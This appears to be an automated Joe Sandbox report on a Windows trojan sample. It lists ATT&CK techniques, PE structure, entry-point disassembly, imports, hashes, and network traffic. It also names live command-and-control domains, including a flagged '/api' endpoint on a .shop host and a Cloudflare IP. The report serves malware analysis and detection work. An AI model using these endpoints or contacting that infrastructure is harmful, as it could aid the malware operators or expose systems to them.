      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      411
      Process Injection
      11
      Virtualization/Sandbox Evasion
      2
      OS Credential Dumping
      1
      System Time Discovery
      Remote Services1
      Screen Capture
      21
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      411
      Process Injection
      LSASS Memory141
      Security Software Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information
      Security Account Manager11
      Virtualization/Sandbox Evasion
      SMB/Windows Admin Shares3
      Data from Local System
      113
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
      Obfuscated Files or Information
      NTDS1
      Process Discovery
      Distributed Component Object Model2
      Clipboard Data
      Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials33
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      qeUaxJCA3FO.exe58%ReversingLabsWin32.Trojan.Zusy
      qeUaxJCA3FO.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://upx.sf.net0%URL Reputationsafe
      bitchsafettyudjwu.shop0%Avira URL Cloudsafe
      radiationnopp.shop0%Avira URL Cloudsafe
      https://bitchsafettyudjwu.shop/apie0%Avira URL Cloudsafe
      benchillppwo.shop0%Avira URL Cloudsafe
      https://bitchsafettyudjwu.shop/0%Avira URL Cloudsafe
      https://bitchsafettyudjwu.shop/PR0%Avira URL Cloudsafe
      bouncedgowp.shop0%Avira URL Cloudsafe
      bargainnykwo.shop0%Avira URL Cloudsafe
      https://bitchsafettyudjwu.shop/on0%Avira URL Cloudsafe
      bannngwko.shop0%Avira URL Cloudsafe
      answerrsdo.shop0%Avira URL Cloudsafe
      publicitttyps.shop0%Avira URL Cloudsafe
      affecthorsedpo.shop0%Avira URL Cloudsafe
      https://bitchsafettyudjwu.shop/api100%Avira URL Cloudmalware
      https://bitchsafettyudjwu.shop/apix0%Avira URL Cloudsafe
      https://bitchsafettyudjwu.shop:443/api100%Avira URL Cloudmalware
      https://bitchsafettyudjwu.shop/pa0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      bitchsafettyudjwu.shop
      104.21.27.50
      truetrue
        unknown
        206.23.85.13.in-addr.arpa
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          benchillppwo.shoptrue
          • Avira URL Cloud: safe
          unknown
          bargainnykwo.shoptrue
          • Avira URL Cloud: safe
          unknown
          bouncedgowp.shoptrue
          • Avira URL Cloud: safe
          unknown
          radiationnopp.shoptrue
          • Avira URL Cloud: safe
          unknown
          bannngwko.shoptrue
          • Avira URL Cloud: safe
          unknown
          bitchsafettyudjwu.shoptrue
          • Avira URL Cloud: safe
          unknown
          publicitttyps.shoptrue
          • Avira URL Cloud: safe
          unknown
          affecthorsedpo.shoptrue
          • Avira URL Cloud: safe
          unknown
          https://bitchsafettyudjwu.shop/apifalse
          • Avira URL Cloud: malware
          unknown
          answerrsdo.shoptrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://bitchsafettyudjwu.shop/apieRegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://bitchsafettyudjwu.shop/onRegAsm.exe, 00000002.00000002.1768091820.000000000146E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://bitchsafettyudjwu.shop/RegAsm.exe, 00000002.00000002.1768091820.000000000146E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://bitchsafettyudjwu.shop/PRRegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://upx.sf.netAmcache.hve.5.drfalse
          • URL Reputation: safe
          unknown
          https://bitchsafettyudjwu.shop/apixRegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://bitchsafettyudjwu.shop:443/apiRegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://bitchsafettyudjwu.shop/paRegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.21.27.50
          bitchsafettyudjwu.shopUnited States
          13335CLOUDFLARENETUStrue
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1467846
          Start date and time:2024-07-04 21:48:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 30s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:11
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:qeUaxJCA3FO.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@6/5@2/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 93%
          • Number of executed functions: 36
          • Number of non-executed functions: 94
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.42.65.92
          • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: qeUaxJCA3FO.exe
          TimeTypeDescription
          15:48:56API Interceptor6x Sleep call for process: RegAsm.exe modified
          15:49:06API Interceptor1x Sleep call for process: WerFault.exe modified
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUSOVER DUE INVOICE PAYMENT.docx.docGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          https://1drv.ms/b/c/76a2f2769a0f2d92/EVBBlcPr69hPlwB4teIJkR8BhOEwtE3haDg1sSdukRfZrw?e=geYoLrGet hashmaliciousHTMLPhisherBrowse
          • 1.1.1.1
          https://1drv.ms/b/c/76a2f2769a0f2d92/EVBBlcPr69hPlwB4teIJkR8BhOEwtE3haDg1sSdukRfZrw?e=geYoLrGet hashmaliciousHTMLPhisherBrowse
          • 1.1.1.1
          file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 104.21.45.251
          xJwSq336bs.pdfGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          https://chorbie.com/services/Get hashmaliciousUnknownBrowse
          • 188.114.96.3
          https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
          • 104.17.28.25
          Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdfGet hashmaliciousHTMLPhisherBrowse
          • 104.21.40.60
          0001.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          a0e9f5d64349fb13191bc781f81f42e1hANEXOPDF.PDF40 234057.msiGet hashmaliciousUnknownBrowse
          • 104.21.27.50
          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
          • 104.21.27.50
          https://www.support.cryptoplanet.in/downloads.phpGet hashmaliciousUnknownBrowse
          • 104.21.27.50
          swift_copy.docx.docGet hashmaliciousUnknownBrowse
          • 104.21.27.50
          Vq3Ri8EP9z.exeGet hashmaliciousLummaCBrowse
          • 104.21.27.50
          SecuriteInfo.com.Win64.Malware-gen.24311.29797.exeGet hashmaliciousLummaCBrowse
          • 104.21.27.50
          SecuriteInfo.com.Win64.Malware-gen.20485.10039.exeGet hashmaliciousLummaCBrowse
          • 104.21.27.50
          file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro StealerBrowse
          • 104.21.27.50
          BDQfYL99b2.exeGet hashmaliciousRemcosBrowse
          • 104.21.27.50
          7EulSGn18e.exeGet hashmaliciousLummaCBrowse
          • 104.21.27.50
          No context
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.7160322192643771
          Encrypted:false
          SSDEEP:96:LsFp3ecT/sqshqgqm7qVftQXIDcQwc6SfcEAcw3VEa+HbHg/8BRTf3Oy1H3a9/Zj:Yp/JlA0+gKijuGzuiFuZ24IO83xo
          MD5:27D1ECA27844F6AFCFED7CFEC7322DF3
          SHA1:497C38D51ED5506DE7339B3B970E5AE54398FD7A
          SHA-256:D463A866CC99FF84840B365F35EAA78AC38D859A0929427B038C49ED38D9F143
          SHA-512:536D3418FAE472CFADF7E1F9460E23C4EC3437E3C6F8AEF2C6EA6C7A00C7E1553618FCA2DD1180835113219BA8389E622A5FB7BFBCE961836788949CF38A141A
          Malicious:true
          Reputation:low
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.5.9.6.1.3.4.6.2.1.4.9.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.5.9.6.1.3.4.9.8.0.8.5.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.b.e.8.c.a.1.-.2.3.0.6.-.4.0.f.b.-.9.1.2.4.-.9.5.b.6.f.a.5.4.4.b.b.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.b.2.f.b.4.d.-.6.a.c.b.-.4.3.e.f.-.9.f.6.4.-.f.3.8.2.5.a.6.c.0.8.0.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.e.U.a.x.J.C.A.3.F.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.8.-.0.0.0.1.-.0.0.1.4.-.e.6.8.0.-.5.3.3.3.4.b.c.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.e.d.a.9.d.6.d.a.b.4.9.4.1.1.c.5.2.f.c.8.6.b.a.f.1.9.a.1.b.4.4.0.0.0.0.f.f.f.f.!.0.0.0.0.e.f.7.6.7.4.f.e.1.3.6.d.8.0.3.0.8.a.4.4.d.9.9.a.c.7.2.b.8.b.e.5.5.0.6.0.4.1.1.0.!.q.e.U.a.x.J.C.A.3.F.O...e.x.e.....T.a.r.g.e.t.A.
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Mini DuMP crash report, 14 streams, Thu Jul 4 19:48:54 2024, 0x1205a4 type
          Category:dropped
          Size (bytes):55908
          Entropy (8bit):1.698977719838576
          Encrypted:false
          SSDEEP:192:870yjOtOQtmRUShYN8gldDBLRNecuLc864LV8FV:6jaUQtm6sYN8gDBLRNeTt64ef
          MD5:D022212E1272878B9B66F375B9EE7E90
          SHA1:A161D8ED910E69CAAE7A6252DDB6848C8BDEBABD
          SHA-256:EEA89588B4BA65BEEACC3BF5B8B3624C50A8CF3345D78334D885EB2206382357
          SHA-512:AC1B2627B5FB3331E9F64E99D57B24E305B8A86771D3982C19F3D8B49548F69D5B9D8986A4FB620CE6087F5AA45FE12727196863C41D8E071B4916BE8218072F
          Malicious:false
          Reputation:low
          Preview:MDMP..a..... ..........f........................0...............p$..........T.......8...........T...........@...$...........,...........................................................................................eJ..............GenuineIntel............T.......h......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):8302
          Entropy (8bit):3.701008219726407
          Encrypted:false
          SSDEEP:192:R6l7wVeJbl6M6Y9hSUsDbWggmfUhmpDy89bgzsf3gm:R6lXJJ6M6YLSUsDbpgmfUWgYfV
          MD5:FF81155B9A71E57EAAE6B9EB8775AA17
          SHA1:52329AC3D957580BABBE9A610A98F3E03BA2C9F1
          SHA-256:AEF48E5BE103E124F69E58AA4DEF3D3E1473636597B643F7EA11E099114C2A98
          SHA-512:A2B8D5A0982DD771C89251425F2229EE7EB16BDE1E630DA0FA5EDE6D373F9C1441D378FEBE0934564A69567A7FE5A660A4975594DFF153086ACBB4E45E00AA87
          Malicious:false
          Reputation:low
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.8.<./.P.i.
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4586
          Entropy (8bit):4.482762197207333
          Encrypted:false
          SSDEEP:48:cvIwWl8zs4Jg77aI9LQWpW8VY2dYm8M4JSFLFBLFFFfQv+q8fF9FCwRyRKjFU8ci:uIjf+I7Jp7VmJSxfEiv3RyIj+d+dd
          MD5:7BDA248AC10989C6D2F7077E73AA123E
          SHA1:0AD2E93150A29AC51188D6236779745CA7DCE7C3
          SHA-256:B86A31A5F7FD7119615B2BD776A4AFC2D420A1478EF391B779A3B9D737996580
          SHA-512:BEBDE725A84E8EF9A6BF06E3D21AFF6079A1C538E60C2532B3249F192430B951B9553456FD944EF0A332D09E458FCB11D47CA8C0204AC32ECA9F3142D24BB8FF
          Malicious:false
          Reputation:low
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="396651" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):1835008
          Entropy (8bit):4.46547603640039
          Encrypted:false
          SSDEEP:6144:vIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN+dwBCswSbA:AXD94+WlLZMM6YFHg+A
          MD5:78736CA7460022345B8E2A98981FDEEC
          SHA1:31BBCADA24EDB0364A8A48E0B521C7D7469D4A1B
          SHA-256:177F86BB2FE62564451D7F016F0760AAA7D707481F0DCD4425A3DE99D4B74DC2
          SHA-512:A8A3FCDF30AACE1255D90B78347860813C9A323447266D030688ED9DA4E32666DFC1BD98CE90CF7474684DF3C14FFB9E0228102238D4DE6CF9AA3608DDE91162
          Malicious:false
          Reputation:low
          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...3K...............................................................................................................................................................................................................................................................................................................................................o..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.6320128013011015
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:qeUaxJCA3FO.exe
          File size:530'432 bytes
          MD5:efc76b9581da08661c9c91c2a6e7d289
          SHA1:ef7674fe136d80308a44d99ac72b8be550604110
          SHA256:85356bb669ec17503e48ca457e99347f5386ba644fba9d638d4188a7b4970153
          SHA512:b2d3432b68b227a5ad64faf6cc789f32ab2234a070c25393849c3d170616a125c1c3c82e18a7952b3ddd3a0024ff845c67aa67ce9b011b9cd9b74e093fc4e5d1
          SSDEEP:12288:MnUGt+HbHe5BjPORtvLP9qpbY7/2E1yItd2ybSLxWP1yh:Mnncbs1PODZqpBCSiS8Pg
          TLSH:68B4F10175C18472E573113706E5DBB69A3EB9300B616ECB6B841F7FCF602C29B3669A
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1.kxb.kxb.kxbj.{c.kxbj.}c.kxbj.|c.kxb{.|c.kxb{.{c.kxbj.yc.kxb.kyb8kxb{.}c.kxbJ.qc.kxbJ.xc.kxbJ..b.kxbJ.zc.kxbRich.kxb.......
          Icon Hash:90cececece8e8eb0
          Entrypoint:0x40afb9
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x66869C92 [Thu Jul 4 12:58:58 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:811cfc8e0687b9bcab4d19d1ac4a7df0
          Instruction
          call 00007F4860B5CFA8h
          jmp 00007F4860B5C7F9h
          cmp ecx, dword ptr [00435040h]
          jne 00007F4860B5C983h
          ret
          jmp 00007F4860B5D2E1h
          jmp 00007F4860B5D4B1h
          push ebp
          mov ebp, esp
          jmp 00007F4860B5C98Fh
          push dword ptr [ebp+08h]
          call 00007F4860B69C66h
          pop ecx
          test eax, eax
          je 00007F4860B5C991h
          push dword ptr [ebp+08h]
          call 00007F4860B65E97h
          pop ecx
          test eax, eax
          je 00007F4860B5C968h
          pop ebp
          ret
          cmp dword ptr [ebp+08h], FFFFFFFFh
          je 00007F4860B5D48Ch
          jmp 00007F4860B594A4h
          push ebp
          mov ebp, esp
          push dword ptr [ebp+08h]
          call 00007F4860B5D476h
          pop ecx
          pop ebp
          ret
          push ebp
          mov ebp, esp
          test byte ptr [ebp+08h], 00000001h
          push esi
          mov esi, ecx
          mov dword ptr [esi], 0042B35Ch
          je 00007F4860B5C98Ch
          push 0000000Ch
          push esi
          call 00007F4860B5C95Dh
          pop ecx
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          push esi
          mov ecx, dword ptr [eax+3Ch]
          add ecx, eax
          movzx eax, word ptr [ecx+14h]
          lea edx, dword ptr [ecx+18h]
          add edx, eax
          movzx eax, word ptr [ecx+06h]
          imul esi, eax, 28h
          add esi, edx
          cmp edx, esi
          je 00007F4860B5C99Bh
          mov ecx, dword ptr [ebp+0Ch]
          cmp ecx, dword ptr [edx+0Ch]
          jc 00007F4860B5C98Ch
          mov eax, dword ptr [edx+08h]
          add eax, dword ptr [edx+0Ch]
          cmp ecx, eax
          jc 00007F4860B5C98Eh
          add edx, 28h
          cmp edx, esi
          jne 00007F4860B5C96Ch
          xor eax, eax
          pop esi
          pop ebp
          ret
          mov eax, edx
          jmp 00007F4860B5C97Bh
          push esi
          call 00007F4860B5D428h
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x341600x48.rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT0x341a80x3c.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x1e0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x830000x1f9c.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x31fc00x1c.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x31f000x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x164.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x278170x27a0060a0db05ce4e38dd78d4dabbb8745b56False0.5494935429810726data6.643882671099797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .BSS0x290000xdfd0xe00e44939ff194ea63962967f5df0ecf385False0.642578125data6.40519127535927IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x2a0000xa9c20xaa00ac1aa776148644c596d3677f95f632bfFalse0.4309972426470588data4.960157816836582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x350000x4cfa40x4c000ae2881be7a656d98fd734520914fbc5dFalse0.9867810701069079data7.989334474529715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x820000x1e00x200c35d66eb0330df7b21d6f51c26172ee0False0.52734375data4.704363013479242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x830000x1f9c0x20008fb1a23c8dee9bb28d69986333c65fb8False0.7489013671875data6.521174734170063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_MANIFEST0x820600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
          DLLImport
          USER32.dllOffsetRect, GetUpdateRgn
          KERNEL32.dllCreateFileW, HeapSize, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, VirtualAlloc, WaitForSingleObject, CreateThread, GetThreadId, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, GetCurrentThreadId, CloseHandle, WaitForSingleObjectEx, GetExitCodeThread, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, ReleaseSRWLockExclusive, WakeAllConditionVariable, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetCPInfo, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, FreeEnvironmentStringsW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, WriteConsoleW
          NameOrdinalAddress
          AwakeSound10x429c70
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSource PortDest PortSource IPDest IP
          Jul 4, 2024 21:48:55.299067974 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:55.299104929 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:55.299173117 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:55.302306890 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:55.302316904 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:55.806049109 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:55.806117058 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:55.814004898 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:55.814013958 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:55.814394951 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:55.867760897 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:55.875117064 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:55.875138044 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:55.875258923 CEST44349730104.21.27.50192.168.2.4
